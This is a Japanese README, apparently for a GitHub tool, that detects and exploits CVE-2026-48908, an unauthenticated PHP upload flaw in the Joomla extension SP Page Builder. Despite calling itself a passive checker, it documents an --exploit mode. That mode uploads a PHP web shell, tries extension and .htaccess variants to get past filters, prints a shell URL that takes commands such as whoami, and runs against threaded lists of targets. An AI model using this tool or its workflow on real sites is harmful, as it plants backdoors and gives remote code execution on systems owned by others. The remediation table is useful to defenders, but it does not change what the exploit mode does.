
SP Page Builder に影響する CVE-2026-48908 のパッシブセキュリティチェッカー。
このプロジェクトは、Joomla 向け拡張機能 SP Page Builder における CVE-2026-48908 の脆弱性を検出・実証するために yora が開発したセキュリティ調査ツールです。
この脆弱性により、攻撃者はエンドポイント asset.uploadCustomIcon を介して認証なしで PHP ファイルをアップロードできます。アップロードされたファイルは公開ディレクトリに展開され、実行可能になるため、リモートコード実行(RCE) につながります。
影響を受けるバージョン: SP Page Builder 1.0.0 ~ 6.6.1(6.6.2 で修正済み)
⚠️ 警告 – このツールは、自分が所有している、またはテストのための書面による許可を得ているシステムでのみ使用してください。許可なく使用することは違法です。
このプロジェクトは、以下の人物によって開発・管理されています:
セキュリティコミュニティと独立系研究者によって支えられています。
git clone https://github.com/yora1928/CVE-2026-48908-by-yora.git
cd CVE-2026-48908-by-yora
python -m pip install -r requirements.txt
requirements.txt:
requests>=2.28.0
python scanner.py --url https://target-website.com
出力例:
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
python scanner.py --url https://target-website.com --exploit
実行内容:
成功時の出力例(実際のテストより):
[*] Scanning: https://target-website.com
[*] Target confirmed vulnerable. Running adaptive exploit...
[*] Trying method: php -> EXECUTED
[🔴 CONFIRMED] https://target-website.com
├─ SP detected
├─ v6.3.1
└─ Vulnerable version 6.3.1 and endpoint open
└─ ✅ RCE confirmed via PoC upload!
Shell URL: https://target-website.com/media/com_sppagebuilder/assets/iconfont/icoyjdehd/fonts/fpqofpk.php?t=7f5e90gcxx0j0r51&c=<cmd>
Created dirs: media/com_sppagebuilder/assets/iconfont/icoyjdehd
Shell URL の使用方法:
c パラメータを指定して URL にアクセスします。...?t=7f5e90gcxx0j0r51&c=whoami🔐 トークン(
t=...)は機密情報です – シェル URL を権限のない第三者と共有しないでください。
targets.txt ファイルを作成します(1 行に 1 つの URL):
https://site1.com
https://site2.com
実行:
python scanner.py --list targets.txt --threads 5
エクスプロイトを有効にする場合:
python scanner.py --list targets.txt --threads 5 --exploit
python scanner.py --url https://target.com --output reports/hasil.json
完了したら、作成されたディレクトリを削除します:
python scanner.py --url https://target.com --exploit --cleanup
注記:
--cleanupは、手動で実行するためのrm -rfコマンドを表示します(書き込み権限が制限されている場合があるため)。FTP/SSH アクセス権がある場合は、Created dirsに記載されているディレクトリを削除してください。
scan_result.json ファイルには、収集されたすべての証拠が含まれます:
{
"scanner": "CVE-2026-48908 Scanner + Exploit",
"scan_time": "2026-08-13T10:30:00.123456+00:00",
"total_targets": 1,
"results": [
{
"target": "https://target.com",
"classification": {
"status": "CONFIRMED",
"confidence": "high",
"reasoning": ["Vulnerable version 6.3.1 and endpoint open"],
"evidence_summary": ["SP asset at /components/..."]
},
"exploit_result": {
"upload_success": true,
"access_success": true,
"shell_url": "https://target.com/media/.../fpqofpk.php?t=TOKEN&c=<cmd>",
"created_dirs": ["media/com_sppagebuilder/assets/iconfont/icoyjdehd"]
}
}
]
}
CVE-2026-48908-by-yora/
├── scanner.py # File utama (deteksi + exploit)
├── requirements.txt # Dependensi Python
├── README.md # Dokumentasi ini
├── SECURITY.md # Kebijakan keamanan dan pelaporan
├── LICENSE # Lisensi MIT
├── detection/ # (opsional) modul deteksi tambahan
├── poc/ # (opsional) PoC alternatif
└── reports/ # Tempat menyimpan hasil JSON (otomatis)
このツールを使用することで、お客様はご自身の行動に対して全責任を負うことに同意したものとみなされます。
問題を発見した場合や貢献したい場合は、このリポジトリで Issue または Pull Request を開いてください。
セキュリティ報告については、SECURITY.md のガイドラインに従ってください。
このプロジェクトは MIT ライセンス の下でライセンスされています。詳細は LICENSE ファイルを参照してください。
yora によって ❤️ を込めて開発されました
| 機能 | 説明 |
|---|
| 🔍 コンポーネント検出 | 複数の情報源(robots.txt、administrator、asset、HTML)から Joomla と SP Page Builder を検出します。 |
| 📌 バージョンフィンガープリント | CSS/JS、メタタグ、マニフェストファイルから SP Page Builder のバージョンを特定します。 |
| 🧪 エンドポイント検証 | 認証なしで asset.uploadCustomIcon へのアクセスをテストします。 |
| 📊 スマート分類 | 結果は、理由と信頼度とともに CONFIRMED / LIKELY / NOT_VULNERABLE / UNKNOWN に分類されます。 |
| 🚀 適応型エクスプロイト | --exploit を使用すると、ツールはさまざまな PHP 拡張子(.php、.php3、.phtml、.PHP など)と .htaccess を試行し、RCE を安全に実証します。 |
| 📁 JSON 出力 | 監査とレポート用に、すべての証拠が .json ファイルに保存されます。 |
| ⚡ マルチスレッド | --list とスレッド設定を使用して、複数のターゲットを同時にスキャンします。 |
| 🧹 クリーンアップ | --cleanup は、アップロードされたアーティファクトを削除するためのコマンドを表示します。 |
| ステータス | 意味 | 推奨される対応 |
|---|
| 🔴 CONFIRMED | SP Page Builder が検出され、脆弱なバージョン(≤ 6.6.1)であり、エンドポイント asset.uploadCustomIcon に認証なしでアクセスできる状態です。脆弱です。 | SP Page Builder を 6.6.2 以降に直ちに更新してください。すでに --exploit を使用した場合は、アップロードされたアーティファクトを削除してください。 |
| 🟡 LIKELY | SP が検出され、バージョンは脆弱ですが、エンドポイントの認証ステータスがまだ確認できません。脆弱である可能性が高いです。 | ログインせずにエンドポイント index.php?option=com_sppagebuilder&task=asset.uploadCustomIcon にアクセスして手動で検証してください。ログイン画面にリダイレクトされなければ、脆弱です。 |
| 🟢 NOT_VULNERABLE | SP Page Builder のバージョン ≥ 6.6.2(修正済み)が検出されました。安全です。 | 追加の対応は不要です。 |
| ⚪ UNKNOWN | SP Page Builder が検出されない、バージョンを特定できない、またはデータが不十分です。 | SP Page Builder がインストールされているか手動で確認してください。インストールされている場合は、/administrator/components/com_sppagebuilder/ にある sppagebuilder.xml ファイルからバージョン検出を試みてください。 |
| ❌ ERROR | 接続エラーまたはタイムアウトが発生しました。 | インターネット接続やファイアウォールを確認するか、--timeout 60 でタイムアウトを延長してみてください。 |